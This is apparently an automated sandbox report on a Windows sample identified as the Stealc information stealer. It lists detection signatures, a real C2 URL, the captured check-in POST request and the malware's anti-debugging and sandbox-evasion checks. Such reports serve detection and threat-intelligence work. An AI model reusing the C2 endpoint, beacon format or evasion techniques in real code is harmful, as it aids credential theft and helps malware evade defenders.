
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1538072
MD5: e6bd9e89d78f9970ffe0edaba03dc207
SHA1: d796439cf7a49abf6a7e19808f6e9da46c40e461
SHA256: 20fe22c7cf9c1c920267161320319a6d7b31354826d68c6bca2b188633cfc181
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 5084 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E6BD9E89D78F9970FFE0EDABA03DC207)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches

Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2144242993.00000000012BE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.2090253153.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 5084 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 5084 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.4f0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-20T09:40:08.469842+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | TCP


AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.4f0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat | 0_2_004FC820
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree | 0_2_004F7240
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree | 0_2_004F9AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F9B60 CryptUnprotectData,LocalAlloc,LocalFree | 0_2_004F9B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00508EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA | 0_2_00508EA0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005038B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_005038B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00504910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00504910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_004FDA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_004FE430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00504570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_00504570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_004FED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_004FBE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_004FDE10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_004F16D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FF68A FindFirstFileA | 0_2_004FF68A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00503EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_00503EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_004FF6B0

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1
  Host: 185.215.113.37
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----ECGIIIDAKJDHJKFHIEBF
  Host: 185.215.113.37
  Content-Length: 211
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Raw: 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 39 42 45 34 35 33 30 31 33 42 46 31 30 37 39 32 30 39 30 34 37 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 2d 2d 0d 0a
  Data Ascii (one line per CRLF in the raw data):
    ------ECGIIIDAKJDHJKFHIEBF
    Content-Disposition: form-data; name="hwid"

    09BE453013BF1079209047
    ------ECGIIIDAKJDHJKFHIEBF
    Content-Disposition: form-data; name="build"

    doma
    ------ECGIIIDAKJDHJKFHIEBF--
Source: Joe Sandbox View | IP Address: 185.215.113.37 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle | 0_2_004F4880
Source: unknown | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----ECGIIIDAKJDHJKFHIEBF
  Host: 185.215.113.37
  Content-Length: 211
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Raw: 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 39 42 45 34 35 33 30 31 33 42 46 31 30 37 39 32 30 39 30 34 37 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 2d 2d 0d 0a
  Data Ascii (one line per CRLF in the raw data):
    ------ECGIIIDAKJDHJKFHIEBF
    Content-Disposition: form-data; name="hwid"

    09BE453013BF1079209047
    ------ECGIIIDAKJDHJKFHIEBF
    Content-Disposition: form-data; name="build"

    doma
    ------ECGIIIDAKJDHJKFHIEBF--
Source: file.exe, 00000000.00000002.2144242993.00000000012BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2144242993.00000000012BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37$
Source: file.exe, 00000000.00000002.2144242993.0000000001302000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2144242993.0000000001317000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2144242993.0000000001302000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/curity=Impersonation
Source: file.exe, 00000000.00000002.2144242993.0000000001317000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2144242993.0000000001317000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpN
Source: file.exe, 00000000.00000002.2144242993.0000000001336000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpa
Source: file.exe, 00000000.00000002.2144242993.0000000001317000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpf
Source: file.exe, 00000000.00000002.2144242993.0000000001336000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpm
Source: file.exe, 00000000.00000002.2144242993.0000000001317000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpr

System Summary

Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007D5A7E | 0_2_007D5A7E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008B82DA | 0_2_008B82DA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008B8BD7 | 0_2_008B8BD7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008BCCE6 | 0_2_008BCCE6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008B3C2D | 0_2_008B3C2D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009AB5DB | 0_2_009AB5DB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0098F5E9 | 0_2_0098F5E9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008BDD05 | 0_2_008BDD05
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008B2553 | 0_2_008B2553
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00867D7C | 0_2_00867D7C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009726B9 | 0_2_009726B9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C4E1B | 0_2_007C4E1B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00763EC1 | 0_2_00763EC1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008B566B | 0_2_008B566B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008BFFAC | 0_2_008BFFAC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00781F83 | 0_2_00781F83
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 004F45C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: bzasfecw ZLIB complexity 0.9950260495318635
Source: file.exe, 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2090253153.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00509600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_00509600
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00503720 CoCreateInstance,MultiByteToWideChar,lstrcpyn | 0_2_00503720
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\4VWSQKQ3.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1851392 > 1048576
Source: file.exe | Static PE information: Raw size of bzasfecw is bigger than: 0x100000 < 0x19de00

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.4f0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;bzasfecw:EW;cqfnmftx:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;bzasfecw:EW;cqfnmftx:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00509860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00509860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1c5783 should be: 0x1d1afb
Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: bzasfecw
Source: file.exe | Static PE information: section name: cqfnmftx
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B608F push 6708C69Ch; mov dword ptr [esp], esi | 0_2_009B5FDC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009570DE push ecx; mov dword ptr [esp], 7DE5FAA4h | 0_2_0095710D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009570DE push ebp; mov dword ptr [esp], 671C3064h | 0_2_0095713E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009570DE push ebp; mov dword ptr [esp], 40B82DCCh | 0_2_00957169
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0097C0C0 push edi; mov dword ptr [esp], ecx | 0_2_0097C0FA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0050B035 push ecx; ret | 0_2_0050B048
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009AB8F7 push ebp; mov dword ptr [esp], 5E1FC633h | 0_2_009AB92E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009AB8F7 push ebx; mov dword ptr [esp], ebp | 0_2_009AB954
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009478EF push 5EA79727h; mov dword ptr [esp], eax | 0_2_00947936
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00940806 push edx; mov dword ptr [esp], ebx | 0_2_00940AE0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008E9026 push edx; mov dword ptr [esp], eax | 0_2_008E9076
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0098B866 push 6E458D10h; mov dword ptr [esp], eax | 0_2_0098B90E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00836993 push ecx; mov dword ptr [esp], 3655F577h | 0_2_008369D3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00836993 push eax; mov dword ptr [esp], 00000000h | 0_2_008369DE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00836993 push ebx; mov dword ptr [esp], 210159ADh | 0_2_008369FE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009479B0 push eax; mov dword ptr [esp], 53F81215h | 0_2_009479D3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093F9A7 push 3F178CF2h; mov dword ptr [esp], ebp | 0_2_0093F9F6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009DD9DD push edx; mov dword ptr [esp], ebx | 0_2_009DDA20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009DD9DD push 1EF31658h; mov dword ptr [esp], eax | 0_2_009DDAAC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008551C7 push ebp; mov dword ptr [esp], eax | 0_2_0085521E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008551C7 push 14B8E45Fh; mov dword ptr [esp], ebx | 0_2_00855226
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008551C7 push ecx; mov dword ptr [esp], 4F9F1E1Ah | 0_2_00855240
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0092E901 push eax; mov dword ptr [esp], ebp | 0_2_0092E941
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091010E push 4EC9E7CAh; mov dword ptr [esp], eax | 0_2_00910139
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091010E push edx; mov dword ptr [esp], eax | 0_2_0091014A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091010E push 0A4D6EE7h; mov dword ptr [esp], edx | 0_2_0091025A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093F13B push eax; mov dword ptr [esp], 2BA2E260h | 0_2_0093F14F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093F13B push edx; mov dword ptr [esp], ebx | 0_2_0093F1AA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093F13B push 5C2CF181h; mov dword ptr [esp], esp | 0_2_0093F22F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A092E push edx; mov dword ptr [esp], esi | 0_2_009A13C9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A092E push esi; mov dword ptr [esp], ebx | 0_2_009A13F1
Source: file.exe | Static PE information: section name: bzasfecw entropy: 7.953590120742498

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00509860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00509860

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13419
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8BD7E4 second address: 8BD7EB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8C4A0C second address: 8C4A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8C4A12 second address: 8C4A16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8C4A16 second address: 8C4A4F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F98219BDB75h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f jmp 00007F98219BDB79h 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8C4A4F second address: 8C4A90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F9820CD6B96h 0x00000009 jmp 00007F9820CD6BA1h 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F9820CD6BA1h 0x00000018 jmp 00007F9820CD6BA1h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8C4BA5 second address: 8C4BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F98219BDB6Dh 0x00000009 jmp 00007F98219BDB70h 0x0000000e pushad 0x0000000f jmp 00007F98219BDB79h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8C4D59 second address: 8C4D60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8C4FE9 second address: 8C4FEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8C7EB0 second address: 8C7EBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8C7EBE second address: 8C7EC8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F98219BDB66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8C7EC8 second address: 8C7ECE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
